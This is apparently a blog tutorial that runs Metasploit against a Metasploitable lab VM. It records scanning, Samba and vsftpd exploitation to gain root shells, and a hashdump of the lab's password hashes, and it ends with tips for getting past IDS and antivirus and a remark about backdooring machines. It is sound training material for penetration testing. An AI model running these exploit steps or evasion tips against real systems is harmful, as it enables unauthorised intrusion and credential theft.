Metasploit is a powerful tool for exploiting vulnerabilities on remote hosts. Metasploit allows you to trivially run an exploit on a host to execute a payload. I will take a look at some basics of Metasploit and use it to exploit some vulnerabilities in a Metasploitable VM.
Starting up the Metasploit framework from Kali. You will see it under Applications -> Exploitation Tools
msf > version
Framework: 4.11.5-2015121501
Console : 4.11.5-2015121501.15168
I can execute relevant Linux commands from within the msf console.
msf > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:df:2f
inet addr:192.168.238.136 Bcast:192.168.238.255 Mask:255.255.255.0
...
I can also use other tools within the msf console.
msf > nmap -sn 192.168.238.0/24
[*] exec: nmap -sn 192.168.238.0/24
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:13 EST
Nmap scan report for 192.168.238.1
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.238.2
Host is up (0.000050s latency).
MAC Address: 00:50:56:E9:39:5C (VMware)
Nmap scan report for 192.168.238.131
Host is up (0.00049s latency).
MAC Address: 00:0C:29:54:6E:48 (VMware)
Nmap scan report for 192.168.238.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:4C:2F (VMware)
Nmap scan report for 192.168.238.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.79 seconds
msf > nmap -sV 192.168.238.131
[*] exec: nmap -sV 192.168.238.131
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:30 EST
Nmap scan report for 192.168.238.131
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:54:6E:48 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds
I will try to gain shell access by exploiting Samba. Metasploit has two ports for Samba open: port 139 and port 445. Port 445 runs Samba over SMB directory over TCP, while port 139 runs Samba over NetBIOS over TCP.
I can search for exploits in the database using the search command:
msf > search Samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
...
The results show the name of the exploit, when the exploit was disclosed, a ranking of the exploit (based on stability of the exploit and range of targets), and a description of the exploit including OS and service versions.
Metasploit also offers a grep tool, which can provide more search flexibility at the cost of formatting:
msf > grep -i samba search
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
I’ll be limited to exploits against Linux, since my only target is Metasploitable. I’m going to just pick one at random and go from there.
msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Exploit target:
Id Name
-- ----
0 Linux vsyscall
RHOST is the target of the attack.
msf exploit(lsa_transnames_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
I will start with a simple exploit to get a shell on the target.
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.238.131 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Payload options (linux/x86/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.238.131 no The target address
Exploit target:
Id Name
-- ----
0 Linux vsyscall
It looks like Metasploit has all the information it needs.
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[-] Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.
The exploit didn’t work. Trying the next exploit:
msf exploit(lsa_transnames_heap) > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show options
Module options (exploit/linux/samba/setinfopolicy_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
StartBrute no Start Address For Brute Forcing
StopBrute no Stop Address For Brute Forcing
Exploit target:
Id Name
-- ----
0 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
I need to reset the RHOST and payload when trying a new exploit.
Exploit target:
Id Name
-- ----
0 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
msf exploit(setinfopolicy_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(setinfopolicy_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(setinfopolicy_heap) > exploit
[*] Started bind handler
[*] Trying to exploit Samba with address 0xb67f1000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[-] Server is most likely patched...
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
This exploit didn’t work either. Trying another:
msf exploit(setinfopolicy_heap) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ciZ6DcyeZcCJsNkV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ciZ6DcyeZcCJsNkV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.238.136:4444 -> 192.168.238.131:33372) at 2016-01-05 19:49:21 -0500
Success! I have a shell on the target. We can press CTRL+Z to save the shell in the background.
^Z
Background session 1? [y/N] y
msf exploit(usermap_script) >
The usermap script attack exploits a command execution vulnerability in Samba through a username field. Since the username is entered before authentication, this exploit requires no authentication!
At this point, we can do one of two things: payloads or post-exploit scripts:
Metasploit offers over 200 payloads, but not every payload is compatible with every exploit. Most payloads you see only open a reverse shell to Metasploit, but a few unique payloads can add and edit files and users, change file permissions, perform DLL injections, or load Meterpreter. Meterpreter is by far the coolest payload offered by Metasploit. Metasploit resides solely in memory (to leave no trace on the disk), injects code into DLLs (so as to not spawn any processes), and all communication to Meterpreter is encrypted.
Once you get Meterpreter running on a machine, it is totally pwnd. Meterpreter gives you a whole environment on the infected machine to allow you to run commands, capture screenshots of the desktop, view the webcam, move the mouse, and capture keyboard input. Since Meterpreter runs only in memory, it will be gone once the machine restarts. It would be best to backdoor the machine.
Post-exploitation script allow us to gather information, pivot to other machines, sniff the network, set up a backdoor, etc.
msf exploit(usermap_script) > search post/linux/gather
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/ecryptfs_creds normal Gather eCryptfs Metadata
post/linux/gather/enum_configs normal Linux Gather Configurations
post/linux/gather/enum_network normal Linux Gather Network Information
post/linux/gather/enum_protections normal Linux Gather Protection Enumeration
post/linux/gather/enum_psk normal Linux Gather 802-11-Wireless-Security Credentials
post/linux/gather/enum_system normal Linux Gather System and User Information
...
I will use a script to gather information from the machine.
msf exploit(usermap_script) > use post/linux/gather/enum_system
I have a session saved from earlier, which I see using the following command.
msf post(enum_system) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 192.168.238.136:4444 -> 192.168.238.131:33372 (192.168.238.131)
sf post(enum_system) > show options
Module options (post/linux/gather/enum_system):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(enum_system) > set SESSION 1
SESSION => 1
msf post(enum_system) > exploit
[+] Info:
Login with msfadmin/msfadmin to get starteded network! ____
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_273307.txt
[*] User accounts stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_703384.txt
[*] Installed Packages stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_304431.txt
[*] Running Services stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_305863.txt
[*] Cron jobs stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_807045.txt
[*] Disk info stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_687962.txt
[*] Logfiles stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_837062.txt
[*] Setuid/setgid files stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_887699.txt
[*] Post module execution completed
There’s a lot of intel in these files. I want to try and gather some password hashes.
msf post(enum_system) > use post/linux/gather/hashdump
msf post(hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf5/loot/20160105212317_default_192.168.238.131_linux.hashes_446028.txt
[*] Post module execution completed
For fun, I’ll exploit another service. Metasploitable is running vsftpd, so I’ll search for exploits.
msf post(hashdump) > search vsftp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf post(hashdump) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.238.136:40469 -> 192.168.238.131:6200) at 2016-01-05 21:44:56 -0500
^Z
Background session 2? [y/N] y
This gives a second session.
msf exploit(vsftpd_234_backdoor) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 192.168.238.136:4444 -> 192.168.238.131:55821 (192.168.238.131)
2 shell unix 192.168.238.136:40469 -> 192.168.238.131:6200 (192.168.238.131)
While Metasploit is an amazingly simple tool to use, one should be mindful of what’s going on under the hood to avoid the “script kiddie” moniker. Metasploit. Some things to keep in mind:
- A decently tuned IDS will probably see you exploiting the service over the wire. Metasploit offers alternate methods of transporting over the wire, as well as different encoding schemes and fragmentation (note: encoding is NOT a good way of avoiding AV). Using an encrypted channel will also render the attack invisible.
- Depending on the exploit or the payload, antivirus may catch on and mark your payload as malicious. DLL injection is an obvious way of avoiding AV because AV only scans the disk, but some exploits require disk writes. When injecting a payload into another process, Metasploit uses a default executable template which is easily detected by AV, regardless of the presence of a payload. If the target has any sort of AV, it is a good idea to change the executable template.
I’m sure I’ll be doing some more advanced attacks with Metasploit later to show off some more features.